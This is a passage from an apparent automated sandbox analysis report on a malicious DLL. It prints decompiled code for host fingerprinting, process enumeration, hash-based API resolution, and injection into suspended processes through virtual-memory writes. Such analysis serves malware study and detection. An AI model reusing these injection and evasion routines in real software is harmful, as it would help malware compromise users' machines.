                            				if(_t57 < 0 || _t57 <= 0 && _t19 < 0x2e830) {
                            					goto L12;
                            				} else {
                            					E10008F78();
                            					GetModuleHandleA(0);
                            					_t22 = _a4;
                            					 *0x1001e69c = _t22;
                            					_t23 = GetModuleFileNameW(_t22,  &_v664, 0x104);
                            					_t24 = GetLastError();
                            					if(_t23 != 0 && _t24 != 0x7a) {
                            						memset( &_v144, 0, 0x80);
                            						_t55 = _t54 + 0xc;
                            						_t53 = 0;
                            						do {
                            							_t27 = E100095C7(_t53);
                            							_a8 = _t27;
                            							MultiByteToWideChar(0, 0, _t27, 0xffffffff,  &_v144, 0x3f);
                            							E100085C2( &_a8);
                            							_t53 =  &(_t53->nLength);
                            						} while (_t53 < 0x2710);
                            						E10012A5B( *0x1001e69c);
                            						 *_t55 = 0x7c3;
                            						 *0x1001e684 = E1000E1BC(0x1001ba28, 0x11c);
                            						 *_t55 = 0xb4e;
                            						_t32 = E100095E1(0x1001ba28);
                            						_a8 = _t32;
                            						_t33 = GetFileAttributesW(_t32); // executed
                            						_push( &_a8);
                            						if(_t33 == 0xffffffff) {
                            							E100085D5();
                            							_v8 = 0;
                            							_t38 = CreateThread(0, 0, E10005E06, 0, 0,  &_v8);
                            							 *0x1001e6a8 = _t38;
                            							if(_t38 == 0) {
                            								goto L10;
                            							}
                            							goto L12;
                            						}
                            						E100085D5();
                            					}
                            					goto L10;
                            				}
                            			}

                            APIs
                            • OutputDebugStringA.KERNEL32(Hello qqq), ref: 10005F92
                            • SetLastError.KERNEL32(000000AA), ref: 100060D7
                              • Part of subcall function 100085EF: HeapCreate.KERNEL32(00000000,00080000,00000000,10005FA7), ref: 100085F8
                              • Part of subcall function 1000980C: GetSystemTimeAsFileTime.KERNEL32(?,?,10005FAF), ref: 10009819
                              • Part of subcall function 1000980C: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10009839
                            • GetModuleHandleA.KERNEL32(00000000), ref: 10005FCC
                            • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 10005FE7
                            • GetLastError.KERNEL32 ref: 10005FEF
                            • memset.MSVCRT ref: 10006013
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,0000003F), ref: 10006035
                            • GetFileAttributesW.KERNEL32(00000000), ref: 10006083
                            • CreateThread.KERNEL32(00000000,00000000,10005E06,00000000,00000000,?), ref: 100060B7
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 0000000D.00000002.624156732.0000000010000000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CreateErrorLastModuleTime$AttributesByteCharDebugHandleHeapMultiNameOutputStringSystemThreadUnothrow_t@std@@@Wide__ehfuncinfo$??2@memset
                            • String ID: Hello qqq
                            • API String ID: 3435743081-3610097158
                            • Opcode ID: 4f0bd1883edd1a52277ce24a9e1719a690fb83a9cd489a56b0391a9d10c83903
                            • Instruction ID: 5d240a4b5adc479b0f810b05b199863bf69006de757f0dcc77d76d9ad36975de
                            • Opcode Fuzzy Hash: 4f0bd1883edd1a52277ce24a9e1719a690fb83a9cd489a56b0391a9d10c83903
                            • Instruction Fuzzy Hash: 8C31E574900654ABF754DB30CC89E6F37A9EF893A0F20C229F855C6195DB34EB49CB21
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            C-Code - Quality: 94%
                            			E1000B7A8(WCHAR* __ecx, void* __edx) {
                            				long _v8;
                            				long _v12;
                            				WCHAR* _v16;
                            				short _v528;
                            				short _v1040;
                            				short _v1552;
                            				WCHAR* _t27;
                            				signed int _t29;
                            				void* _t33;
                            				long _t38;
                            				WCHAR* _t43;
                            				WCHAR* _t56;
                            
                            				_t44 = __ecx;
                            				_v8 = _v8 & 0x00000000;
                            				_t43 = __edx;
                            				_t56 = __ecx;
                            				memset(__edx, 0, 0x100);
                            				_v12 = 0x100;
                            				GetComputerNameW( &_v528,  &_v12);
                            				lstrcpynW(_t43,  &_v528, 0x100);
                            				_t27 = E100095E1(_t44, 0xa88);
                            				_v16 = _t27;
                            				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
                            				asm("sbb eax, eax");
                            				_v8 = _v8 &  ~_t29;
                            				E100085D5( &_v16);
                            				_t33 = E1000C392(_t43);
                            				E10009640( &(_t43[E1000C392(_t43)]), 0x100 - _t33, L"%u", _v8);
                            				lstrcatW(_t43, _t56);
                            				_t38 = E1000C392(_t43);
                            				_v12 = _t38;
                            				CharUpperBuffW(_t43, _t38);
                            				return E1000D400(_t43, E1000C392(_t43) + _t40, 0);
                            			}

                            APIs
                            • memset.MSVCRT ref: 1000B7C5
                            • GetComputerNameW.KERNEL32(?,?,74EC17D9,00000000,74EC11C0), ref: 1000B7E0
                            • lstrcpynW.KERNEL32(?,?,00000100), ref: 1000B7EF
                            • GetVolumeInformationW.KERNEL32(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 1000B821
                              • Part of subcall function 10009640: _vsnwprintf.MSVCRT ref: 1000965D
                            • lstrcatW.KERNEL32 ref: 1000B85A
                            • CharUpperBuffW.USER32(?,00000000), ref: 1000B86C
                            Memory Dump Source
                            • Source File: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 0000000D.00000002.624156732.0000000010000000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: BuffCharComputerInformationNameUpperVolume_vsnwprintflstrcatlstrcpynmemset
                            • String ID:
                            • API String ID: 3410906232-0
                            • Opcode ID: e02f1f27a289323d5cde8029b6ecff98d3f99e1de03a06f737997213c2c83dbc
                            • Instruction ID: 180e092026911c17520c8b5fa365ce7934641c9957428f094d539ad927535ab9
                            • Opcode Fuzzy Hash: e02f1f27a289323d5cde8029b6ecff98d3f99e1de03a06f737997213c2c83dbc
                            • Instruction Fuzzy Hash: 9C2171B6900218BFE714DBA4CC8AFAF77BCEB44250F108169F505D6185EA75AF448B60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 187 1000aba3-1000abc7 CreateToolhelp32Snapshot 188 1000ac38-1000ac3e 187->188 189 1000abc9-1000abf2 memset Process32First 187->189 190 1000ac02-1000ac13 call 1000ccc0 189->190 191 1000abf4-1000ac00 189->191 195 1000ac15-1000ac26 Process32Next 190->195 196 1000ac28-1000ac35 CloseHandle 190->196 191->188 195->190 195->196 196->188
                            C-Code - Quality: 100%
                            			E1000ABA3(intOrPtr __ecx, void* __edx) {
                            				void* _v304;
                            				void* _v308;
                            				signed int _t14;
                            				signed int _t15;
                            				void* _t22;
                            				intOrPtr _t28;
                            				void* _t31;
                            				intOrPtr _t33;
                            				void* _t40;
                            				void* _t42;
                            
                            				_t33 = __ecx;
                            				_t31 = __edx; // executed
                            				_t14 = CreateToolhelp32Snapshot(2, 0);
                            				_t42 = _t14;
                            				_t15 = _t14 | 0xffffffff;
                            				if(_t42 != _t15) {
                            					memset( &_v304, 0, 0x128);
                            					_v304 = 0x128;
                            					if(Process32First(_t42,  &_v304) != 0) {
                            						while(1) {
                            							_t22 = E1000CCC0(_t33,  &_v308, _t31); // executed
                            							_t40 = _t22;
                            							if(_t40 == 0) {
                            								break;
                            							}
                            							_t33 =  *0x1001e684; // 0x19afaa0
                            							if(Process32Next(_t42,  &_v308) != 0) {
                            								continue;
                            							}
                            							break;
                            						}
                            						CloseHandle(_t42);
                            						_t15 = 0 | _t40 == 0x00000000;
                            					} else {
                            						_t28 =  *0x1001e684; // 0x19afaa0
                            						 *((intOrPtr*)(_t28 + 0x30))(_t42);
                            						_t15 = 0xfffffffe;
                            					}
                            				}
                            				return _t15;
                            			}

                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000011,?,00000010), ref: 1000ABBD
                            • memset.MSVCRT ref: 1000ABD6
                            • Process32First.KERNEL32(00000000,?), ref: 1000ABED
                            • Process32Next.KERNEL32(00000000,?), ref: 1000AC21
                            • CloseHandle.KERNEL32(00000000), ref: 1000AC2E
                            Memory Dump Source
                            • Source File: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 0000000D.00000002.624156732.0000000010000000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32memset
                            • String ID:
                            • API String ID: 1267121359-0
                            • Opcode ID: 54e2d860bd13bc7846415f36553112f28911b30db34f205904eaa96e1d06a1b9
                            • Instruction ID: 824b075522648d78722121d86b555edf1df252a9305654497386a44dc5d3d608
                            • Opcode Fuzzy Hash: 54e2d860bd13bc7846415f36553112f28911b30db34f205904eaa96e1d06a1b9
                            • Instruction Fuzzy Hash: B11191732043556BF710DB68DC89E9F37ECEB863A0F560A29F624CB181EB30D9058762
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 197 1000dfad-1000dfc4 198 1000e021 197->198 199 1000dfc6-1000dfee 197->199 200 1000e023-1000e027 198->200 199->198 201 1000dff0-1000e013 call 1000c379 call 1000d400 199->201 206 1000e015-1000e01f 201->206 207 1000e028-1000e03f 201->207 206->198 206->201 208 1000e041-1000e049 207->208 209 1000e095-1000e097 207->209 208->209 210 1000e04b 208->210 209->200 211 1000e04d-1000e053 210->211 212 1000e063-1000e074 211->212 213 1000e055-1000e057 211->213 215 1000e076-1000e077 212->215 216 1000e079-1000e085 LoadLibraryA 212->216 213->212 214 1000e059-1000e061 213->214 214->211 214->212 215->216 216->198 217 1000e087-1000e091 GetProcAddress 216->217 217->198 218 1000e093 217->218 218->200
                            C-Code - Quality: 100%
                            			E1000DFAD(void* __ecx, intOrPtr __edx) {
                            				signed int _v8;
                            				intOrPtr _v12;
                            				intOrPtr _v16;
                            				intOrPtr _v20;
                            				intOrPtr _v24;
                            				intOrPtr _v28;
                            				char _v92;
                            				intOrPtr _t41;
                            				signed int _t47;
                            				signed int _t49;
                            				signed int _t51;
                            				void* _t56;
                            				struct HINSTANCE__* _t58;
                            				_Unknown_base(*)()* _t59;
                            				intOrPtr _t60;
                            				void* _t62;
                            				intOrPtr _t63;
                            				void* _t69;
                            				char _t70;
                            				void* _t75;
                            				CHAR* _t80;
                            				void* _t82;
                            
                            				_t75 = __ecx;
                            				_v12 = __edx;
                            				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
                            				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
                            				if(_t41 == 0) {
                            					L4:
                            					return 0;
                            				}
                            				_t62 = _t41 + __ecx;
                            				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
                            				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
                            				_t63 =  *((intOrPtr*)(_t62 + 0x18));
                            				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
                            				_t47 = 0;
                            				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
                            				_v8 = 0;
                            				_v16 = _t63;
                            				if(_t63 == 0) {
                            					goto L4;
                            				} else {
                            					goto L2;
                            				}
                            				while(1) {
                            					L2:
                            					_t49 = E1000D400( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E1000C379( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
                            					_t51 = _v8;
                            					if((_t49 ^ 0x218fe95b) == _v12) {
                            						break;
                            					}
                            					_t73 = _v20;
                            					_t47 = _t51 + 1;
                            					_v8 = _t47;
                            					if(_t47 < _v16) {
                            						continue;
                            					}
                            					goto L4;
                            				}
                            				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
                            				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
                            				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
                            					return _t80;
                            				} else {
                            					_t56 = 0;
                            					while(1) {
                            						_t70 = _t80[_t56];
                            						if(_t70 == 0x2e || _t70 == 0) {
                            							break;
                            						}
                            						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
                            						_t56 = _t56 + 1;
                            						if(_t56 < 0x40) {
                            							continue;
                            						}
                            						break;
                            					}
                            					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
                            					 *((char*)(_t82 + _t56 - 0x54)) = 0;
                            					if( *((char*)(_t56 + _t80)) != 0) {
                            						_t80 =  &(( &(_t80[1]))[_t56]);
                            					}
                            					_t40 =  &_v92; // 0x6c6c642e
                            					_t58 = LoadLibraryA(_t40); // executed
                            					if(_t58 == 0) {
                            						goto L4;
                            					}
                            					_t59 = GetProcAddress(_t58, _t80);
                            					if(_t59 == 0) {
                            						goto L4;
                            					}
                            					return _t59;
                            				}
                            			}

                            APIs
                            • LoadLibraryA.KERNEL32(.dll), ref: 1000E07D
                            • GetProcAddress.KERNEL32(00000000,8DF08B59), ref: 1000E089
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 0000000D.00000002.624156732.0000000010000000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: .dll
                            • API String ID: 2574300362-2738580789
                            • Opcode ID: b7447c8816937ad7f9345e32d2240df4bb2b7db976f4be3fc21d842f10db7ef4
                            • Instruction ID: 6da95daea6e89431fe10e6910c52a9851ea62cfcad36df982cd2ab94b172e300
                            • Opcode Fuzzy Hash: b7447c8816937ad7f9345e32d2240df4bb2b7db976f4be3fc21d842f10db7ef4
                            • Instruction Fuzzy Hash: F631E431A002998BEB54CFA9C8847AEBBF5EF44384F24446DD905E7349D770ED81C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 430 1000ca25-1000ca45 call 1000c8fd 433 1000cb73-1000cb76 430->433 434 1000ca4b-1000ca6c call 1000a86d 430->434 437 1000ca72-1000ca74 434->437 438 1000cb63-1000cb72 call 1000861a 434->438 439 1000cb51-1000cb61 call 1000861a 437->439 440 1000ca7a 437->440 438->433 439->438 443 1000ca7d-1000ca7f 440->443 446 1000cb42-1000cb4b 443->446 447 1000ca85-1000ca9b call 1000ae66 443->447 446->437 446->439 450 1000cb00-1000cb04 447->450 451 1000ca9d-1000cab0 call 1000cb77 447->451 452 1000cb06-1000cb08 450->452 453 1000cb2f-1000cb3c 450->453 451->450 458 1000cab2-1000caca 451->458 455 1000cb19-1000cb29 452->455 456 1000cb0a-1000cb10 452->456 453->443 453->446 455->453 456->455 458->450 461 1000cacc-1000cae7 GetLastError ResumeThread 458->461 462 1000cae9-1000caf4 461->462 463 1000cafc-1000cafd CloseHandle 461->463 465 1000caf6 462->465 466 1000caf7 462->466 463->450 465->466 466->463
                            C-Code - Quality: 89%
                            			E1000CA25(intOrPtr __edx) {
                            				signed int _v8;
                            				intOrPtr _v12;
                            				signed int _v16;
                            				intOrPtr _v20;
                            				char _v24;
                            				void* _v36;
                            				char _v40;
                            				char _v80;
                            				char _t37;
                            				intOrPtr _t38;
                            				void* _t45;
                            				intOrPtr _t47;
                            				intOrPtr _t48;
                            				intOrPtr _t50;
                            				intOrPtr _t52;
                            				void* _t54;
                            				intOrPtr _t57;
                            				long _t61;
                            				intOrPtr _t62;
                            				signed int _t65;
                            				signed int _t68;
                            				signed int _t82;
                            				void* _t85;
                            				char _t86;
                            
                            				_v8 = _v8 & 0x00000000;
                            				_v20 = __edx;
                            				_t65 = 0;
                            				_t37 = E1000C8FD( &_v8);
                            				_t86 = _t37;
                            				_v24 = _t86;
                            				_t87 = _t86;
                            				if(_t86 == 0) {
                            					return _t37;
                            				}
                            				_t38 =  *0x1001e688; // 0x1930590
                            				E1000A86D( &_v80,  *((intOrPtr*)(_t38 + 0xac)) + 7, _t87);
                            				_t82 = _v8;
                            				_t68 = 0;
                            				_v16 = 0;
                            				if(_t82 == 0) {
                            					L20:
                            					E1000861A( &_v24, 0);
                            					return _t65;
                            				}
                            				while(_t65 == 0) {
                            					while(_t65 == 0) {
                            						asm("stosd");
                            						asm("stosd");
                            						asm("stosd");
                            						asm("stosd");
                            						_t45 = E1000AE66( *((intOrPtr*)(_t86 + _t68 * 4)),  &_v40); // executed
                            						_t92 = _t45;
                            						if(_t45 >= 0) {
                            							_t54 = E1000CB77(E10005CEC,  &_v40, _t92, _v20); // executed
                            							if(_t54 != 0) {
                            								_t57 =  *0x1001e684; // 0x19afaa0
                            								_t85 =  *((intOrPtr*)(_t57 + 0xc4))(0, 0, 0,  &_v80);
                            								if(_t85 != 0) {
                            									GetLastError();
                            									_t61 = ResumeThread(_v36);
                            									_t62 =  *0x1001e684; // 0x19afaa0
                            									if(_t61 != 0) {
                            										_push(0xea60);
                            										_push(_t85);
                            										if( *((intOrPtr*)(_t62 + 0x2c))() == 0) {
                            											_t65 = _t65 + 1;
                            										}
                            										_t62 =  *0x1001e684; // 0x19afaa0
                            									}
                            									CloseHandle(_t85);
                            								}
                            							}
                            						}
                            						if(_v40 != 0) {
                            							if(_t65 == 0) {
                            								_t52 =  *0x1001e684; // 0x19afaa0
                            								 *((intOrPtr*)(_t52 + 0x104))(_v40, _t65);
                            							}
                            							_t48 =  *0x1001e684; // 0x19afaa0
                            							 *((intOrPtr*)(_t48 + 0x30))(_v36);
                            							_t50 =  *0x1001e684; // 0x19afaa0
                            							 *((intOrPtr*)(_t50 + 0x30))(_v40);
                            						}
                            						_t68 = _v16;
                            						_t47 = _v12 + 1;
                            						_v12 = _t47;
                            						if(_t47 < 2) {
                            							continue;
                            						} else {
                            							break;
                            						}
                            					}
                            					_t82 = _v8;
                            					_t68 = _t68 + 1;
                            					_v16 = _t68;
                            					if(_t68 < _t82) {
                            						continue;
                            					} else {
                            						break;
                            					}
                            					do {
                            						goto L19;
                            					} while (_t82 != 0);
                            					goto L20;
                            				}
                            				L19:
                            				E1000861A(_t86, 0xfffffffe);
                            				_t86 = _t86 + 4;
                            				_t82 = _t82 - 1;
                            			}

                            APIs
                              • Part of subcall function 1000AE66: memset.MSVCRT ref: 1000AE85
                              • Part of subcall function 1000AE66: CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,00000000,00000000), ref: 1000AEA5
                              • Part of subcall function 1000CB77: memset.MSVCRT ref: 1000CBB8
                              • Part of subcall function 1000CB77: NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 1000CC22
                              • Part of subcall function 1000CB77: NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 1000CC3F
                              • Part of subcall function 1000CB77: NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 1000CC60
                              • Part of subcall function 1000CB77: FreeLibrary.KERNEL32(00000000,?,00000000,00000000), ref: 1000CC73
                            • GetLastError.KERNEL32(?,00000001), ref: 1000CACC
                            • ResumeThread.KERNEL32(?,?,00000001), ref: 1000CADA
                            • CloseHandle.KERNEL32(00000000,?,00000001), ref: 1000CAFD
                            Memory Dump Source
                            • Source File: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 0000000D.00000002.624156732.0000000010000000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: MemoryVirtual$Protectmemset$CloseCreateErrorFreeHandleLastLibraryProcessResumeThreadWrite
                            • String ID:
                            • API String ID: 1274669455-0
                            • Opcode ID: fa01402cc64924efbc228351cece4e0558249ade2dca9af57fb62686f16e4da8
                            • Instruction ID: 8d942f140de3fd5d428a133cfbe882c53197cdce90259c44b1bbe97365db357f
                            • Opcode Fuzzy Hash: fa01402cc64924efbc228351cece4e0558249ade2dca9af57fb62686f16e4da8
                            • Instruction Fuzzy Hash: AF417E31A00319AFEB01DFA8C985EAE77F9FF58390F124168F501E7265DB30AE058B51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 467 1000b998-1000b9b8 GetTokenInformation 468 1000b9ba-1000b9c3 GetLastError 467->468 469 1000b9fe 467->469 468->469 471 1000b9c5-1000b9d5 call 10008604 468->471 470 1000ba00-1000ba04 469->470 474 1000b9d7-1000b9d9 471->474 475 1000b9db-1000b9ee GetTokenInformation 471->475 474->470 475->469 476 1000b9f0-1000b9fc call 1000861a 475->476 476->474
                            C-Code - Quality: 86%
                            			E1000B998(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
                            				long _v8;
                            				void* _v12;
                            				void* _t12;
                            				void* _t20;
                            				void* _t22;
                            				union _TOKEN_INFORMATION_CLASS _t28;
                            				void* _t31;
                            
                            				_push(_t22);
                            				_push(_t22);
                            				_t31 = 0;
                            				_t28 = __edx;
                            				_t20 = _t22;
                            				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
                            					L6:
                            					_t12 = _t31;
                            				} else {
                            					_t31 = E10008604(_v8);
                            					_v12 = _t31;
                            					if(_t31 != 0) {
                            						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
                            							goto L6;
                            						} else {
                            							E1000861A( &_v12, _t16);
                            							goto L3;
                            						}
                            					} else {
                            						L3:
                            						_t12 = 0;
                            					}
                            				}
                            				return _t12;
                            			}

                            APIs
                            • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,74EC17D9,00000000,10000000,00000000,00000000,?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9B3
                            • GetLastError.KERNEL32(?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9BA
                              • Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612
                            • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,1000BA37,?,00000000,?,1000D0A8), ref: 1000B9E9
                            Memory Dump Source
                            • Source File: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 0000000D.00000002.624156732.0000000010000000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: InformationToken$AllocErrorHeapLast
                            • String ID:
                            • API String ID: 4258577378-0
                            • Opcode ID: 25ca12ee674f2655c61ae174559f6c02d40ec3235ed2cc3a33db728961b5c84c
                            • Instruction ID: 0e837ad5d344672522dd0af1a739acbaf95446ba78b21159f473d30cfb6f5d1d
                            • Opcode Fuzzy Hash: 25ca12ee674f2655c61ae174559f6c02d40ec3235ed2cc3a33db728961b5c84c
                            • Instruction Fuzzy Hash: 8E01A27260066ABFAB24DFA6CC89D8F7FECEB456E17120225F605D3124E630DE00C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 612 1000ae66-1000aeb3 memset CreateProcessW
                            C-Code - Quality: 47%
                            			E1000AE66(WCHAR* __ecx, struct _PROCESS_INFORMATION* __edx) {
                            				struct _STARTUPINFOW _v72;
                            				signed int _t11;
                            				WCHAR* _t15;
                            				int _t19;
                            				struct _PROCESS_INFORMATION* _t20;
                            
                            				_t20 = __edx;
                            				_t15 = __ecx;
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				_t19 = 0x44;
                            				memset( &_v72, 0, _t19);
                            				_v72.cb = _t19;
                            				_t11 = CreateProcessW(0, _t15, 0, 0, 0, 4, 0, 0,  &_v72, _t20);
                            				asm("sbb eax, eax");
                            				return  ~( ~_t11) - 1;
                            			}

                            APIs
                            • memset.MSVCRT ref: 1000AE85
                            • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,00000000,00000000), ref: 1000AEA5
                            Memory Dump Source
                            • Source File: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 0000000D.00000002.624156732.0000000010000000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateProcessmemset
                            • String ID:
                            • API String ID: 2296119082-0
                            • Opcode ID: 9215398e04c0e1465519a4e0e52a5396276f524f1bd12603e09a1ebda4c409e5
                            • Instruction ID: 8cd7357356a5339f89587e4f6554bd087a86913dd4092c53185382899a550088
                            • Opcode Fuzzy Hash: 9215398e04c0e1465519a4e0e52a5396276f524f1bd12603e09a1ebda4c409e5
                            • Instruction Fuzzy Hash: 63F012F26041187FF760D6ADDC46EBB77ACC789654F104532FA05D6190E560ED058161
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 47%
                            			E1000E1BC(void* __ecx, void* __edx, intOrPtr _a4) {
                            				char _v8;
                            				char _t5;
                            				struct HINSTANCE__* _t7;
                            				void* _t10;
                            				void* _t12;
                            				void* _t22;
                            				void* _t25;
                            
                            				_push(__ecx);
                            				_t12 = __ecx;
                            				_t22 = __edx;
                            				_t5 = E100095C7(_a4);
                            				_t25 = 0;
                            				_v8 = _t5;
                            				_push(_t5);
                            				if(_a4 != 0x7c3) {
                            					_t7 = LoadLibraryA(); // executed
                            				} else {
                            					_t7 = GetModuleHandleA();
                            				}
                            				if(_t7 != 0) {
                            					_t10 = E1000E171(_t12, _t22, _t7); // executed
                            					_t25 = _t10;
                            				}
                            				E100085C2( &_v8);
                            				return _t25;
                            			}

                            APIs
                            • GetModuleHandleA.KERNEL32(00000000,00000000,00000001,?,1001BA28), ref: 1000E1DE
                            • LoadLibraryA.KERNEL32(00000000,00000000,00000001,?,1001BA28), ref: 1000E1EB
                            Memory Dump Source
                            • Source File: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 0000000D.00000002.624156732.0000000010000000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: HandleLibraryLoadModule
                            • String ID:
                            • API String ID: 4133054770-0
                            • Opcode ID: 475ae924f075fca7c4d943cada4b77f08c9b111225325e3c1749fe1895f8c309
                            • Instruction ID: 73ed2ebf8e11191eb6597406948a09e9f6d4d80ef2ff5e7d934a0b04cc0c2bea
                            • Opcode Fuzzy Hash: 475ae924f075fca7c4d943cada4b77f08c9b111225325e3c1749fe1895f8c309
                            • Instruction Fuzzy Hash: 92F08231704254ABE704DB69DC8589EB7EDEB547D1710402AF406E3255DA70DE0087A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E1000CCC0(void* __ecx, intOrPtr _a4, signed int _a8) {
                            				CHAR* _v8;
                            				int _t28;
                            				signed int _t31;
                            				signed int _t34;
                            				signed int _t35;
                            				void* _t38;
                            				signed int* _t41;
                            
                            				_t41 = _a8;
                            				_t31 = 0;
                            				if(_t41[1] > 0) {
                            					_t38 = 0;
                            					do {
                            						_t3 =  &(_t41[2]); // 0xe6840d8b
                            						_t34 =  *_t3;
                            						_t35 = 0;
                            						_a8 = 0;
                            						if( *((intOrPtr*)(_t38 + _t34 + 8)) > 0) {
                            							_v8 = _a4 + 0x24;
                            							while(1) {
                            								_t28 = lstrcmpiA(_v8,  *( *((intOrPtr*)(_t38 + _t34 + 0xc)) + _t35 * 4));
                            								_t14 =  &(_t41[2]); // 0xe6840d8b
                            								_t34 =  *_t14;
                            								if(_t28 == 0) {
                            									break;
                            								}
                            								_t35 = _a8 + 1;
                            								_a8 = _t35;
                            								if(_t35 <  *((intOrPtr*)(_t34 + _t38 + 8))) {
                            									continue;
                            								} else {
                            								}
                            								goto L8;
                            							}
                            							 *_t41 =  *_t41 |  *(_t34 + _t38);
                            						}
                            						L8:
                            						_t31 = _t31 + 1;
                            						_t38 = _t38 + 0x10;
                            						_t20 =  &(_t41[1]); // 0x1374ff85
                            					} while (_t31 <  *_t20);
                            				}
                            				Sleep(0xa);
                            				return 1;
                            			}











                            APIs
                            • lstrcmpiA.KERNEL32(?,?,00000128,00000000,?,?,?,1000AC0D,?,?), ref: 1000CCF4
                            • Sleep.KERNEL32(0000000A,00000000,?,?,?,1000AC0D,?,?), ref: 1000CD26
                            Memory Dump Source
                            • Source File: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 0000000D.00000002.624156732.0000000010000000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Sleeplstrcmpi
                            • String ID:
                            • API String ID: 1261054337-0
